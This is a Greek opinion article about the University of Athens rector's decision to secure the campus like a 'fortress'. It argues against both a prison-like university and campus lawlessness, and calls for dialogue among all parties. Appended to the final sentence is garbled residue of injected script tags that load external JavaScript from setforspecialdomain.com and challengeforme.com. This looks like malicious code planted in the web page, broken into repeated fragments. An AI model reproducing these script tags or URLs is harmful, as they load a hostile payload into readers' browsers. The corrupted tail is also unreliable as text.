ΕΚΠΑ: Μονόδρομος ο διάλογος

1435494_h0891645.limghandler

Πολλά λέγονται και πολλά γράφονται στην ειδησεογραφία των τελευταίων ημερών, σχετικά με την απόφαση του πρύτανη του ΕΚΠΑ να μετατρέψει το πανεπιστήμιο σε “φρούριο”. Η κόντρα έχει μεταφερθεί, όπως ήταν αναμενόμενο και σε πολιτικό επίπεδο, με την Κυβέρνηση και την Αντιπολίτευση να ανταλλάσουν αιχμηρά βέλη σχετικά με την εν λόγω απόφαση, που έχει αναστατώσει ολόκληρη την Ακαδημαϊκή κοινότητα της χώρας.

Γράφει ο Γιάννης Δραπανιώτης

Το συγκεκριμένο θέμα σίγουρα χρειάζεται να εξεταστεί με πολύ προσοχή, διότι είναι αρκετά ευαίσθητο, αφού έχει να κάνει με το τι παιδεία θέλουμε τελικά ως χώρα.

Κανείς σώφρον και νοήμων άνθρωπος δεν μπορεί να είναι σύμφωνος με το να μετατρέπονται τα πανεπιστήμια σε «Αλκατράζ». Τα πανεπιστημιακά ιδρύματα είναι, εκτός από χώρος παραγωγής παιδείας και χώρος παραγωγής πολιτισμού, ελεύθερης διακίνησης ιδεών και γόνιμου διαλόγου, που συνεισφέρει τα μέγιστα στην ανάπτυξη και πρόοδο μιας χώρας. Έτσι είναι ή τουλάχιστον έτσι πρέπει να είναι…. Άρα τέτοιοι χώροι δεν μπορούν να έχουν εικόνα φυλακών υψίστης ασφαλείας.

Κάθε νόμισμα όμως έχει δύο όψεις.  Δυστυχώς στη χώρα μας, πολλές φορές τα πανεπιστήμια μετατρέπονται σε ορμητήρια κάθε λογής έκνομης δραστηριότητας. Στόχος συνεχών βανδαλισμών και χώρος δράσης, προβοκατόρων παρακρατικών μπαχαλάκιδων, που με το πρόσχημα του ασύλου και δήθεν ορμώμενοι από μια ψευτοκουλτούρα κάνουν πράξη τις εντολές που ίσως λαμβάνουν και εκ των …άνωθεν!!!

Όλα τα παραπάνω, εκτός από τα πλείστα κοινωνικά προβλήματα που δημιουργούν συντελούν και σε μία καταστροφή ανυπολόγιστη. Και αυτή δεν είναι άλλη από την άσχημη εικόνα και την απαξίωση του δημόσιου πανεπιστημίου και της δημόσιας δωρεάν παιδείας. Ανοίγοντας διάπλατα το δρόμο στα μεγάλα ιδιωτικά συμφέροντα και στην απώλεια ενός ακόμη σημαντικού δημόσιου αγαθού.

Σίγουρα θα πρέπει να δοθεί λύση. Αν θέλουμε να κάνουμε λίγο και το συνήγορο του διαβόλου, ίσως αυτό να είχε κατά νου ο πρύτανης του ΕΚΠΑ. Βέβαια, από το ένα άκρο πήγε στο άλλο και φυσικά είναι προφανές πως τα άκρα δεν μπορούν να αποτελέσουν ή να δώσουν λύσεις. Δεν μπορούμε ούτε στο όνομα της νομιμότητας να δημιουργούμε σύγχρονα στρατόπεδα συγκέντρωσης, ούτε φυσικά στο όνομα της ελευθερίας να υπερασπιζόμαστε την παρανομία και το μπάχαλο.

Η ορθή λύση θα δοθεί μόνο μέσα από έναν πλατύ, με σύνεση και σοβαρότητα διάλογο, όλων των εμπλεκόμενων φορέων. Η οποιαδήποτε μονομερής ενέργεια δεν λύνει το πρόβλημα αντιθέτως το οξύνει.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >